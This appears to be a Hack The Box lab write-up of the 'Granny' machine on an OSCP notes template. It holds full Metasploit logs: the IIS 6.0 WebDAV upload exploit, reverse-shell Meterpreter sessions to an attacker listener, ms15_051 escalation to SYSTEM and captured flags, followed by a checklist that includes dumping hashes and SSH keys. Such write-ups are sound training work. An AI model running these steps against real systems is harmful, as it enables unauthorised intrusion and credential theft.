10.10.10.15 - Granny

Enumeration

TCP

nmap -sC -sV -oA ./Granny 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 21:04 EDT
Nmap scan report for 10.10.10.15
Host is up (0.088s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Date: Fri, 03 Apr 2020 01:04:54 GMT
|   Server Type: Microsoft-IIS/6.0
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds

UDP
Web Services
Nikto
Dirb\DirBuster
WebDav
CMS
Other Services
SMB
SNMP
DB
Other

Exploitation

Service Exploited:
Vulnerability Type:
Exploit POC:
Description:

Discovery of Vulnerability

msf5 > use exploit/windows/iis/iis_webdav_upload_asp
msf5 exploit(windows/iis/iis_webdav_upload_asp) > options

Module options (exploit/windows/iis/iis_webdav_upload_asp):

   Name          Current Setting        Required  Description
   ----          ---------------        --------  -----------
   HttpPassword                         no        The HTTP password to specify for authentication
   HttpUsername                         no        The HTTP username to specify for authentication
   METHOD        move                   yes       Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
   PATH          /metasploit%RAND%.asp  yes       The path to attempt to upload
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80                     yes       The target port (TCP)
   SSL           false                  no        Negotiate SSL/TLS for outgoing connections
   VHOST                                no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/iis/iis_webdav_upload_asp) > set rhosts 10.10.10.15
rhosts => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_upload_asp) > run

[*] Started reverse TCP handler on 10.10.14.28:4444
[*] Checking /metasploit11327895.asp
[*] Uploading 610747 bytes to /metasploit11327895.txt...
[*] Moving /metasploit11327895.txt to /metasploit11327895.asp...
[*] Executing /metasploit11327895.asp...
[*] Deleting /metasploit11327895.asp (this doesn't always work)...
[*] Sending stage (180291 bytes) to 10.10.10.15
[!] Deletion failed on /metasploit11327895.asp [403 Forbidden]
[*] Meterpreter session 1 opened (10.10.14.28:4444 -> 10.10.10.15:1032) at 2020-04-02 21:16:02 -0400

Exploit Code Used

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Post Exploitation

Script Results

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

Host Information
Operating System Architecture Domain Installed Updates

File System
Writeable Files\Directories Directory List

Process List

Network
IPConfig\IFConfig Network Processes ARP DNS Route

Users & Groups
Users Groups

Installed Applications
Installed Applications

Scheduled Jobs
Scheduled Tasks

Priv Escalation

Service Exploited:
Vulnerability Type:
Exploit POC:
Description:

Discovery of Vulnerability

Exploit Code Used

msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > options

Module options (exploit/windows/local/ms15_051_client_copy_image):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/ms15_051_client_copy_image) > set session 1
session => 1
msf5 exploit(windows/local/ms15_051_client_copy_image) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms15_051_client_copy_image) > set lhost 10.10.14.28
lhost => 10.10.14.28
msf5 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.14.28:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms15_051_client_copy_image) > sessions 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 580   396   svchost.exe
 668   396   svchost.exe
 724   396   svchost.exe
 752   396   svchost.exe
 788   396   svchost.exe
 924   396   spoolsv.exe
 988   396   msdtc.exe
 1068  396   cisvc.exe
 1112  396   svchost.exe
 1168  396   inetinfo.exe
 1204  396   svchost.exe
 1316  396   VGAuthService.exe
 1360  348   logon.scr
 1404  396   vmtoolsd.exe
 1460  396   svchost.exe
 1600  396   svchost.exe
 1712  396   alg.exe
 1864  580   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1912  396   dllhost.exe
 2284  580   wmiprvse.exe
 3012  580   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3584  1460  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3704  3584  svchost.exe        x86   0                                      C:\WINDOWS\Temp\radB5155.tmp\svchost.exe
 3896  1068  cidaemon.exe
 3940  1068  cidaemon.exe
 3976  1068  cidaemon.exe

meterpreter > migrate 1864
[*] Migrating from 3704 to 1864...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.14.28:4444
[*] Launching notepad to host the exploit...
[+] Process 3556 launched.
[*] Reflectively injecting the exploit DLL into 3556...
[*] Injecting exploit into 3556...
[*] Exploit injected. Injecting payload into 3556...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.28:4444 -> 10.10.10.15:1033) at 2020-04-02 21:23:27 -0400

meterpreter > shell
[-] Unknown command: shell.
meterpreter > getuif
[-] Unknown command: getuif.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3828 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>cd \
cd \

C:\>
meterpreter > shell
Process 4048 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>cd \
cd \

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  05:27 PM    <DIR>          ADFS
04/12/2017  05:04 PM                 0 AUTOEXEC.BAT
04/12/2017  05:04 PM                 0 CONFIG.SYS
04/12/2017  10:19 PM    <DIR>          Documents and Settings
04/12/2017  05:17 PM    <DIR>          FPSE_search
04/12/2017  05:17 PM    <DIR>          Inetpub
12/24/2017  08:21 PM    <DIR>          Program Files
12/24/2017  08:30 PM    <DIR>          WINDOWS
04/12/2017  05:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,091,319,296 bytes free

C:\>cd "documents and settings"
cd "documents and settings"

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  10:19 PM    <DIR>          .
04/12/2017  10:19 PM    <DIR>          ..
04/12/2017  09:48 PM    <DIR>          Administrator
04/12/2017  05:03 PM    <DIR>          All Users
04/12/2017  10:19 PM    <DIR>          Lakis
               0 File(s)              0 bytes
               5 Dir(s)  18,091,315,200 bytes free

C:\Documents and Settings>type Administrator\Desktop\root.txt
type Administrator\Desktop\root.txt
aa4beed1c0584445ab463a6747bd06e9
C:\Documents and Settings>type Lakis\Desk
meterpreter > type Lakis\Desktop\user.txt
[-] Unknown command: type.
meterpreter > shell
Process 1200 created.
Channel 3 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>cd
cd
C:\WINDOWS\system32

C:\WINDOWS\system32>cd \Users
cd \Users
The system cannot find the path specified.

C:\WINDOWS\system32>cd \
cd \

C:\>cd "Documents and settings:
cd "Documents and settings:
The filename, directory name, or volume label syntax is incorrect.

C:\>cd "Documents and settings"
cd "Documents and settings"

C:\Documents and Settings>type Lakis\Desktop
meterpreter > shell
Process 2984 created.
Channel 4 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>type C:\"Documents and Settings"\Lakis\Desktop\user.txt
type C:\"Documents and Settings"\Lakis\Desktop\user.txt
700c5dc163014e22b3e408f8703f67d1
C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 10.10.10.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

C:\WINDOWS\system32>
meterpreter >

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Goodies

Hashes
Passwords
Proof\Flags\Other

Software Versions
Software Versions Potential Exploits

Methodology

Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r 10.11.1.0/24
☐ smbtree

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning

WebApp
Nikto
dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadaver
☐ droopescan
☐ joomscan
☐ LFI\RFI Test

Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux

Anything Else
nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation

Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggester.sh
☐ unix-privesc-check.py

Windows
☐ wpc.exe
☐ windows-exploit-suggester.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
access internal services (portfwd)
☐ add account

Windows
☐ List of exploits

Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files

Log Book